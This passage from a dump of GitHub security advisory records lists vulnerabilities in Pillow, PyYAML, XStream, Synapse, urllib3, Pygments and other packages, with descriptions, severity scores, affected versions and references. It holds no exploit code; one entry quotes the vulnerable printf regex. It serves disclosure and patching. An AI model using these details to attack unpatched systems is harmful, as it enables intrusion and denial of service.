'https://pillow.readthedocs.io/en/stable/releasenotes/8.1.1.html'}, {'type': 'WEB', 'url': 'https://security.gentoo.org/glsa/202107-33'}]","{'cwe_ids': ['CWE-787'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-03-22T22:07:48Z', 'nvd_published_at': '2021-03-19T04:15:00Z'}" +1.4.0,GHSA-874w-m2v2-mj64,2022-10-07T13:10:52Z,2021-03-29T20:48:45Z,,['CVE-2019-15151'],Double Free in Adplug,AdPlug 2.3.1 has a double free in the `Cu6mPlayer` class in `u6m.h`.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'NuGet', 'name': 'adplug'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.3.3'}]}], 'database_specific': {'last_known_affected_version_range': '<= 2.3.1'}}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2019-15151'}, {'type': 'WEB', 'url': 'https://github.com/adplug/adplug/issues/91'}, {'type': 'WEB', 'url': 'https://github.com/adplug/adplug/commit/1a282a486a8e33fef3e15998bf6408d3515dc07e'}, {'type': 'WEB', 'url': 'https://github.com/miller-alex/adplug/commit/8abb9328bf27dcbdafc67ade3e75af0ffd8f7633'}, {'type': 'PACKAGE', 'url': 'https://github.com/adplug/adplug'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/Q32A64R2APAC5PXIMSYIEFDQX5AD4GAS/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/U3PW6PLDTPSQQRHKTU2FB72SUB4Q66NE/'}]","{'cwe_ids': ['CWE-415'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-03-23T20:51:24Z', 'nvd_published_at': '2019-08-18T21:15:00Z'}" +1.4.0,GHSA-hf64-x4gq-p99h,2023-09-04T16:27:59Z,2021-03-18T19:55:34Z,,['CVE-2020-35655'],Pillow Out-of-bounds Read,"In Pillow before 8.1.0, SGIRleDecode has a 4-byte buffer over-read when decoding crafted SGI RLE image files because offsets and length tables are mishandled.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:L'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'Pillow'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '8.1.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-35655'}, {'type': 'PACKAGE', 'url': 'https://github.com/python-pillow/Pillow'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/6BYVI5G44MRIPERKYDQEL3S3YQCZTVHE/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/BF553AMNNNBW7SH4IM4MNE4M6GNZQ7YD/'}, {'type': 'WEB', 'url': 'https://pillow.readthedocs.io/en/stable/releasenotes/index.html'}]","{'cwe_ids': ['CWE-125'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-03-12T23:17:03Z', 'nvd_published_at': '2021-01-12T09:15:00Z'}" +1.4.0,GHSA-8q59-q68h-6hv4,2021-09-28T19:04:49Z,2021-03-25T21:26:26Z,,['CVE-2020-14343'],Improper Input Validation in PyYAML,"A vulnerability was discovered in the PyYAML library in versions before 5.4, where it is susceptible to arbitrary code execution when it processes untrusted YAML files through the full_load method or with the FullLoader loader. Applications that use the library to process untrusted input may be vulnerable to this flaw. This flaw allows an attacker to execute arbitrary code on the system by abusing the python/object/new constructor. This flaw is due to an incomplete fix for CVE-2020-1747.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'PyYAML'}, 'ecosystem_specific': {'affected_functions': ['yaml.constructor.FullConstructor', 'yaml.constructor.UnsafeConstructor']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '5.4'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-14343'}, {'type': 'WEB', 'url': 'https://github.com/SeldonIO/seldon-core/issues/2252'}, {'type': 'WEB', 'url': 'https://github.com/yaml/pyyaml/issues/420'}, {'type': 'WEB', 'url': 'https://github.com/yaml/pyyaml/issues/420#issuecomment-663673966'}, {'type': 'WEB', 'url': 'https://github.com/yaml/pyyaml/commit/a001f2782501ad2d24986959f0239a354675f9dc'}, {'type': 'WEB', 'url': 'https://bugzilla.redhat.com/show_bug.cgi?id=1860466'}, {'type': 'PACKAGE', 'url': 'https://github.com/yaml/pyyaml'}, {'type': 'WEB', 'url': 'https://pypi.org/project/PyYAML/'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuapr2022.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpujul2022.html'}]","{'cwe_ids': ['CWE-20'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-03-25T21:15:23Z', 'nvd_published_at': '2021-02-09T21:15:00Z'}" +1.4.0,GHSA-x2jp-hh65-4xvf,2021-11-18T15:25:56Z,2021-03-29T20:42:15Z,,['CVE-2021-20280'],Cross-site scripting (XSS) and Server side request forgery (SSRF) in moodle,"Text-based feedback answers required additional sanitizing to prevent stored XSS and blind SSRF risks in moodle before 3.10.2, 3.9.5, 3.8.8, 3.5.17.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'moodle/moodle'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '3.10'}, {'fixed': '3.10.2'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'moodle/moodle'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '3.9'}, {'fixed': '3.9.5'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'moodle/moodle'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '3.8'}, {'fixed': '3.8.8'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'moodle/moodle'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '3.5'}, {'fixed': '3.5.17'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-20280'}, {'type': 'WEB', 'url': 'https://github.com/moodle/moodle/commit/a303eb9e9e387f95ea2a80cb1ce6c0b132ec1cc4'}, {'type': 'WEB', 'url': 'https://bugzilla.redhat.com/show_bug.cgi?id=1939037'}, {'type': 'PACKAGE', 'url': 'https://github.com/moodle/moodle'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/AFSNJ7XHVTC52RSRX2GBQFF3VEEAY2MS/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/FGOMHMYM3WICJ6D6U22Z6LPJGT5A6MZM/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UFH5DDMU5TZ3JT4Q52WMRAHACA5MHIMT/'}, {'type': 'WEB', 'url': 'https://moodle.org/mod/forum/discuss.php?d=419651'}, {'type': 'WEB', 'url': 'http://packetstormsecurity.com/files/164817/Moodle-Cross-Site-Scripting-Server-Side-Request-Forgery.html'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-03-24T23:18:11Z', 'nvd_published_at': '2021-03-15T22:15:00Z'}" +1.4.0,GHSA-xgpf-p52j-pf7m,2021-03-24T17:41:15Z,2021-03-24T17:42:02Z,,['CVE-2021-27938'],XSS in CreateQueuedJobTask,A vulnerability has been identified in the Silverstripe CMS 3 and 4 version of the symbiote/silverstripe-queuedjobs module. A Cross Site Scripting vulnerability allows an attacker to inject an arbitrary payload in the CreateQueuedJobTask dev task via a specially crafted URL.,[],"[{'package': {'ecosystem': 'Packagist', 'name': 'symbiote/silverstripe-queuedjobs'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '3.0.0'}, {'fixed': '3.0.2'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'symbiote/silverstripe-queuedjobs'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '3.1.0'}, {'fixed': '3.1.4'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'symbiote/silverstripe-queuedjobs'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '4.0.0'}, {'fixed': '4.0.7'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'symbiote/silverstripe-queuedjobs'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '4.1.0'}, {'fixed': '4.1.2'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'symbiote/silverstripe-queuedjobs'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '4.2.0'}, {'fixed': '4.2.4'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'symbiote/silverstripe-queuedjobs'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '4.3.0'}, {'fixed': '4.3.3'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'symbiote/silverstripe-queuedjobs'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '4.4.0'}, {'fixed': '4.4.3'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'symbiote/silverstripe-queuedjobs'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '4.5.0'}, {'fixed': '4.5.1'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'symbiote/silverstripe-queuedjobs'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '4.6.0'}, {'fixed': '4.6.4'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-27938'}, {'type': 'WEB', 'url': 'https://github.com/FriendsOfPHP/security-advisories/blob/master/symbiote/silverstripe-queuedjobs/CVE-2021-27938.yaml'}, {'type': 'WEB', 'url': 'https://github.com/symbiote/silverstripe-queuedjobs/releases'}, {'type': 'WEB', 'url': 'https://www.silverstripe.org/download/security-releases/cve-2021-27938'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-03-24T17:41:15Z', 'nvd_published_at': '2021-03-16T16:15:00Z'}" +1.4.0,GHSA-f6hm-88x3-mfjv,2022-02-08T21:32:19Z,2021-03-22T23:29:19Z,,['CVE-2021-21349'],A Server-Side Forgery Request can be activated unmarshalling with XStream to access data streams from an arbitrary URL referencing a resource in an intranet or the local host,"### Impact +The vulnerability may allow a remote attacker to request data from internal resources that are not publicly available only by manipulating the processed input stream. No user is affected, who followed the recommendation to setup XStream's security framework with a whitelist limited to the minimal required types. + +### Patches +If you rely on XStream's default blacklist of the [Security Framework](https://x-stream.github.io/security.html#framework), you will have to use at least version 1.4.16. + +### Workarounds +See [workarounds](https://x-stream.github.io/security.html#workaround) for the different versions covering all CVEs. + +### References +See full information about the nature of the vulnerability and the steps to reproduce it in XStream's documentation for [CVE-2021-21349](https://x-stream.github.io/CVE-2021-21349.html). + +### Credits +The vulnerability was discovered and reported by threedr3am. + +### For more information +If you have any questions or comments about this advisory: +* Open an issue in [XStream](https://github.com/x-stream/xstream/issues) +* Contact us at [XStream Google Group](https://groups.google.com/group/xstream-user)","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:N/I:H/A:N'}]","[{'package': {'ecosystem': 'Maven', 'name': 'com.thoughtworks.xstream:xstream'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.4.16'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/x-stream/xstream/security/advisories/GHSA-f6hm-88x3-mfjv'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-21349'}, {'type': 'PACKAGE', 'url': 'https://github.com/x-stream/xstream'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r8244fd0831db894d5e89911ded9c72196d395a90ae655414d23ed0dd@%3Cusers.activemq.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r9ac71b047767205aa22e3a08cb33f3e0586de6b2fac48b425c6e16b0@%3Cdev.jmeter.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.debian.org/debian-lts-announce/2021/04/msg00002.html'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/22KVR6B5IZP3BGQ3HPWIO2FWWCKT3DHP/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/PVPHZA7VW2RRSDCOIPP2W6O5ND254TU7/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/QGXIU3YDPG6OGTDHMBLAFN7BPBERXREB/'}, {'type': 'WEB', 'url': 'https://security.netapp.com/advisory/ntap-20210430-0002/'}, {'type': 'WEB', 'url': 'https://www.debian.org/security/2021/dsa-5004'}, {'type': 'WEB', 'url': 'https://www.oracle.com//security-alerts/cpujul2021.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpujan2022.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuoct2021.html'}, {'type': 'WEB', 'url': 'https://x-stream.github.io/CVE-2021-21349.html'}, {'type': 'WEB', 'url': 'https://x-stream.github.io/security.html#workaround'}, {'type': 'WEB', 'url': 'http://x-stream.github.io/changes.html#1.4.16'}]","{'cwe_ids': ['CWE-502', 'CWE-918'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-03-22T23:26:25Z', 'nvd_published_at': '2021-03-23T00:15:00Z'}" +1.4.0,GHSA-246w-56m2-5899,2021-08-31T21:07:23Z,2021-03-26T19:52:54Z,,['CVE-2021-21332'],Cross-site scripting (XSS) vulnerability in the password reset endpoint,"### Impact +The password reset endpoint served via Synapse was vulnerable to cross-site scripting (XSS) attacks. The impact depends on the configuration of the domain that Synapse is deployed on, but may allow access to cookies and other browser data, CSRF vulnerabilities, and access to other resources served on the same domain or parent domains. + +### Patches +This is fixed in #9200. + +### Workarounds +Depending on the needs and configuration of the homeserver a few options are available: + +1. Password resets can be disabled by delegating email to a third-party service (via the `account_threepid_delegates.email` setting) or disabling email (by not configuring the `email` setting). + +2. If the homeserver is not configured to use passwords (via the `password_config.enabled` setting) then the affected endpoint can be blocked at a reverse proxy: + + * `/_synapse/client/password_reset/email/submit_token` + +3. The `password_reset_confirmation.html` template can be overridden with a custom template that manually escapes the variables using [JInja2's `escape` filter](https://jinja.palletsprojects.com/en/2.11.x/templates/#escape). See the `email.template_dir` setting.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:L/A:N'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'matrix-synapse'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.27.0'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/matrix-org/synapse/security/advisories/GHSA-246w-56m2-5899'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-21332'}, {'type': 'WEB', 'url': 'https://github.com/matrix-org/synapse/pull/9200'}, {'type': 'WEB', 'url': 'https://github.com/matrix-org/synapse/commit/e54746bdf7d5c831eabe4dcea76a7626f1de73df'}, {'type': 'PACKAGE', 'url': 'https://github.com/matrix-org/synapse'}, {'type': 'WEB', 'url': 'https://github.com/matrix-org/synapse/releases/tag/v1.27.0'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/TNNAJOZNMVMXM6AS7RFFKB4QLUJ4IFEY/'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-03-26T19:52:12Z', 'nvd_published_at': '2021-03-26T20:15:00Z'}" +1.4.0,GHSA-3wvg-mj6g-m9cv,2023-09-04T16:26:56Z,2021-03-18T19:55:21Z,,['CVE-2021-27922'],Pillow Uncontrolled Resource Consumption,"Pillow before 8.1.1 allows attackers to cause a denial of service (memory consumption) because the reported size of a contained image is not properly checked for an ICNS container, and thus an attempted memory allocation can be very large.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'Pillow'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '8.1.1'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-27922'}, {'type': 'PACKAGE', 'url': 'https://github.com/python-pillow/Pillow'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/S7G44Z33J4BNI2DPDROHWGVG2U7ZH5JU/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/TQQY6472RX4J2SUJENWDZAWKTJJGP2ML/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZTSY25UJU7NJUFHH3HWT575LT4TDFWBZ/'}, {'type': 'WEB', 'url': 'https://pillow.readthedocs.io/en/stable/releasenotes/8.1.1.html'}, {'type': 'WEB', 'url': 'https://security.gentoo.org/glsa/202107-33'}]","{'cwe_ids': ['CWE-400'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-03-12T23:20:39Z', 'nvd_published_at': '2021-03-03T09:15:00Z'}" +1.4.0,GHSA-5phf-pp7p-vc2r,2021-10-21T17:32:38Z,2021-03-19T19:42:11Z,,['CVE-2021-28363'],Using default SSLContext for HTTPS requests in an HTTPS proxy doesn't verify certificate hostname for proxy connection,"### Impact + +Users who are using an HTTPS proxy to issue HTTPS requests and haven't configured their own SSLContext via `proxy_config`. +Only the default SSLContext is impacted. + +### Patches + +[urllib3 >=1.26.4 has the issue resolved](https://github.com/urllib3/urllib3/releases/tag/1.26.4). urllib3<1.26 is not impacted due to not supporting HTTPS requests via HTTPS proxies. + +### Workarounds + +Upgrading is recommended as this is a minor release and not likely to break current usage. + +Configuring an `SSLContext` with `check_hostname=True` and passing via `proxy_config` instead of relying on the default `SSLContext` + +### For more information +If you have any questions or comments about this advisory: +* Email us at [sethmichaellarson@gmail.com](mailto:sethmichaellarson@gmail.com)","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'urllib3'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.26.0'}, {'fixed': '1.26.4'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/urllib3/urllib3/security/advisories/GHSA-5phf-pp7p-vc2r'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-28363'}, {'type': 'WEB', 'url': 'https://github.com/urllib3/urllib3/commit/8d65ea1ecf6e2cdc27d42124e587c1b83a3118b0'}, {'type': 'WEB', 'url': 'https://github.com/pypa/advisory-db/tree/main/vulns/urllib3/PYSEC-2021-59.yaml'}, {'type': 'PACKAGE', 'url': 'https://github.com/urllib3/urllib3'}, {'type': 'WEB', 'url': 'https://github.com/urllib3/urllib3/blob/main/CHANGES.rst#1264-2021-03-15'}, {'type': 'WEB', 'url': 'https://github.com/urllib3/urllib3/commits/main'}, {'type': 'WEB', 'url': 'https://github.com/urllib3/urllib3/releases/tag/1.26.4'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/4S65ZQVZ2ODGB52IC7VJDBUK4M5INCXL/'}, {'type': 'WEB', 'url': 'https://pypi.org/project/urllib3/1.26.4/'}, {'type': 'WEB', 'url': 'https://security.gentoo.org/glsa/202107-36'}, {'type': 'WEB', 'url': 'https://security.gentoo.org/glsa/202305-02'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuoct2021.html'}]","{'cwe_ids': ['CWE-295'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-03-19T19:41:48Z', 'nvd_published_at': '2021-03-15T18:15:00Z'}" +1.4.0,GHSA-xfhp-gmh8-r8v2,2023-09-08T20:24:11Z,2021-03-19T21:22:10Z,,['CVE-2021-23354'],printf vulnerable to Regular Expression Denial of Service (ReDoS),"The package printf before 0.6.1 are vulnerable to Regular Expression Denial of Service (ReDoS) via the regex string +```regex +/\%(?:\(([\w_.]+)\)|([1-9]\d*)\$)?([0 +\-\]*)(\*|\d+)?(\.)?(\*|\d+)?[hlL]?([\%bscdeEfFgGioOuxX])/g +``` + in `lib/printf.js`. The vulnerable regular expression has cubic worst-case time complexity.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'printf'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.6.1'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-23354'}, {'type': 'WEB', 'url': 'https://github.com/adaltas/node-printf/issues/31'}, {'type': 'WEB', 'url': 'https://github.com/adaltas/node-printf/pull/32'}, {'type': 'WEB', 'url': 'https://github.com/adaltas/node-printf/commit/a8502e7c9b0b22555696a2d8ef67722086413a68'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JS-PRINTF-1072096'}]","{'cwe_ids': ['CWE-400'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-03-15T18:59:14Z', 'nvd_published_at': '2021-03-12T15:15:00Z'}" +1.4.0,GHSA-v648-p92f-9996,2021-03-19T20:35:47Z,2021-03-29T20:57:39Z,,['CVE-2019-0925'],Out-of-bounds write,"A remote code execution vulnerability exists in the way that the Chakra scripting engine handles objects in memory in Microsoft Edge, aka 'Chakra Scripting Engine Memory Corruption Vulnerability'. This CVE ID is unique from CVE-2019-0912, CVE-2019-0913, CVE-2019-0914, CVE-2019-0915, CVE-2019-0916, CVE-2019-0917, CVE-2019-0922, CVE-2019-0923, CVE-2019-0924, CVE-2019-0927, CVE-2019-0933, CVE-2019-0937.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'NuGet', 'name': 'Microsoft.ChakraCore'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.11.9'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2019-0925'}, {'type': 'WEB', 'url': 'https://github.com/chakra-core/ChakraCore/commit/32ca10f3955f2a3ca56c6671c721b1264eca06b8'}, {'type': 'WEB', 'url': 'https://github.com/chakra-core/ChakraCore/commit/d797e3f00e34c12c8c0ae52f56344325439dccd7'}, {'type': 'WEB', 'url': 'https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0925'}]","{'cwe_ids': ['CWE-787'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-03-19T20:35:47Z', 'nvd_published_at': '2019-05-16T19:29:00Z'}" +1.4.0,GHSA-pq64-v7f5-gqh8,2023-08-07T11:43:18Z,2021-03-29T16:33:03Z,,['CVE-2021-27291'],Pygments vulnerable to Regular Expression Denial of Service (ReDoS),"In pygments 1.1+, fixed in 2.7.4, the lexers used to parse programming languages rely heavily on regular expressions. Some of the regular expressions have exponential or cubic worst-case complexity and are vulnerable to ReDoS. By crafting malicious input, an attacker can cause a denial of service.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'Pygments'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.1'}, {'fixed': '2.7.4'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-27291'}, {'type': 'WEB', 'url': 'https://github.com/pygments/pygments/commit/2e7e8c4a7b318f4032493773732754e418279a14'}, {'type': 'WEB', 'url': 'https://gist.github.com/b-c-ds/b1a2cc0c68a35c57188575eb496de5ce'}, {'type': 'PACKAGE', 'url': 'https://github.com/pygments/pygments'}, {'type': 'WEB', 'url': 'https://lists.debian.org/debian-lts-announce/2021/03/msg00024.html'}, {'type': 'WEB', 'url': 'https://lists.debian.org/debian-lts-announce/2021/05/msg00003.html'}, {'type': 'WEB', 'url': 'https://lists.debian.org/debian-lts-announce/2021/05/msg00006.html'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/GSJRFHALQ7E3UV4FFMFU2YQ6LUDHAI55/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/WSLD67LFGXOX2K5YNESSWAS4AGZIJTUQ/'}, {'type': 'WEB', 'url': 'https://www.debian.org/security/2021/dsa-4878'}, {'type': 'WEB', 'url': 'https://www.debian.org/security/2021/dsa-4889'}]","{'cwe_ids': ['CWE-400'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-03-22T20:28:40Z', 'nvd_published_at': '2021-03-17T13:15:00Z'}" +1.4.0,GHSA-vqcj-wrf2-7v73,2023-09-04T16:27:22Z,2021-03-18T19:55:27Z,,['CVE-2020-35654'],Pillow Out-of-bounds Write,"In Pillow before 8.1.0, TiffDecode has a heap-based buffer overflow when decoding crafted YCbCr files because of certain interpretation conflicts with LibTIFF in RGBA mode.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'Pillow'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '8.1.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-35654'}, {'type': 'PACKAGE', 'url': 'https://github.com/python-pillow/Pillow'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/6BYVI5G44MRIPERKYDQEL3S3YQCZTVHE/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/BF553AMNNNBW7SH4IM4MNE4M6GNZQ7YD/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/TQQY6472RX4J2SUJENWDZAWKTJJGP2ML/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZTSY25UJU7NJUFHH3HWT575LT4TDFWBZ/'}, {'type': 'WEB', 'url': 'https://pillow.readthedocs.io/en/stable/releasenotes/index.html'}]","{'cwe_ids': ['CWE-787'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-03-12T23:18:25Z', 'nvd_published_at': '2021-01-12T09:15:00Z'}" +1.4.0,GHSA-4wv4-mgfq-598v,2021-03-12T19:13:27Z,2021-03-12T23:00:19Z,,[],Code injection in nobelprizeparser,Code injection through use of eval.,[],"[{'package': {'ecosystem': 'npm', 'name': 'nobelprizeparser'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.0.2'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/AnneTheDev/nobelprize/security/advisories/GHSA-4wv4-mgfq-598v'}, {'type': 'WEB', 'url': 'https://github.com/AnneTheDev/nobelprize/commit/00639d375b0efd097bc1eca18d9dc021691b9286'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/package/nobelprizeparser'}]","{'cwe_ids': ['CWE-94'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-03-12T19:13:27Z', 'nvd_published_at': None}" +1.4.0,GHSA-f38p-c2gq-4pmr,2022-07-05T18:05:18Z,2021-03-19T20:14:21Z,,['CVE-2021-21267'],Regular Expression Denial-of-Service in npm schema-inspector,"### Impact +_What kind of vulnerability is it? Who is impacted?_ +Email address validation is vulnerable to a denial-of-service attack where some input (for example 